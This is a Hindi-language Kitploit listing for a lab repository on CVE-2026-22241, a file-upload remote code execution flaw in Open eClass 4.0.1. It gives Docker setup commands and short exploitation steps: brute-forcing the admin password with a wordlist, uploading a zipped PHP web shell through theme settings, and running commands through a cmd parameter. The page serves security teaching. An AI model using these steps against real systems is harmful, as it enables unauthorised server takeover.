Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-22241 — CVE-2026-22241 के लिए प्रयोगशाला वातावरण | Kitploit
उपकरण/GitHubGitHub/cves-labs/cve-2026-22241
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षालैब और अभ्यास
GitHubcves-labs/cve-2026-22241

CVE-2026-22241

CVE-2026-22241 के लिए प्रयोगशाला वातावरण

रिपॉजिटरी देखें
1 महीना पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2026-22241

CVE-2026-22241 के लिए प्रयोगशाला वातावरण

भेद्यता विवरण:

  • भेद्यता: खतरनाक प्रकार की फ़ाइल का असीमित अपलोड।
  • प्रभाव: दूरस्थ कोड निष्पादन (RCE)।
  • विवरण: यह दोष एक प्रशासनिक अधिकारों वाले हमलावर को एक दुर्भावनापूर्ण PHP फ़ाइल (वेब शेल) अपलोड करने की अनुमति देता है, जिससे वेब सर्वर की अखंडता और सुरक्षा पूरी तरह से प्रभावित होती है।
  • लक्ष्य प्रणाली: OpenClass शैक्षिक बुनियादी ढांचा।

1. वातावरण बनाएं

sudo git clone https://github.com/CVEs-Labs/CVE-2026-22241.git

https://www.openeclass.org/en/previous-versions/ खोलें और openeclass-4.0.1.zip डाउनलोड करें

sudo apt update && sudo apt install docker.io docker-compose -y

sudo systemctl start docker

sudo cp openeclass-4.0.1.zip CVE-2026-22241

cd CVE-2026-22241

sudo mkdir html

sudo unzip openeclass-4.0.1.zip -d ./temp_folder

sudo mv ./temp_folder/openeclass-4.0.1/* ./html/

sudo rm -rf ./temp_folder

sudo rm -rf openeclass-4.0.1.zip

sudo chown -R $USER:www-data html/

sudo chmod -R 775 html/

sudo docker-compose up -d

sudo docker exec -it eclass-web bash -c "apt-get update && apt-get install -y libpng-dev libzip-dev libicu-dev libxml2-dev libldap2-dev && docker-php-ext-configure ldap --with-libdir=lib/x86_64-linux-gnu/ && docker-php-ext-install zip gd pdo pdo_mysql intl soap ldap && apache2ctl restart"

sudo docker inspect -f '{{range .NetworkSettings.Networks}}{{.IPAddress}}{{end}}' eclass-web

http://ip-docker

चित्र

2. भेद्यता का शोषण करें:

ZAP में कुंजी सूची (ब्रूट फोर्स) के लिए: https://gitlab.com/kalilinux/packages/seclists/-/blob/kali/master/Passwords/Common-Credentials/Pwdb_top-1000.txt

zip poc.zip evil.php

eclass पेज में: एडमिन टूल → थीम सेटिंग्स पर जाएं → फिर poc.zip अपलोड करें

नए पेज में:

http://ip-docker/courses/theme_data/evil.php?cmd=whoami

http://ip-docker/courses/theme_data/evil.php?cmd=id

टूल डाउनलोड करें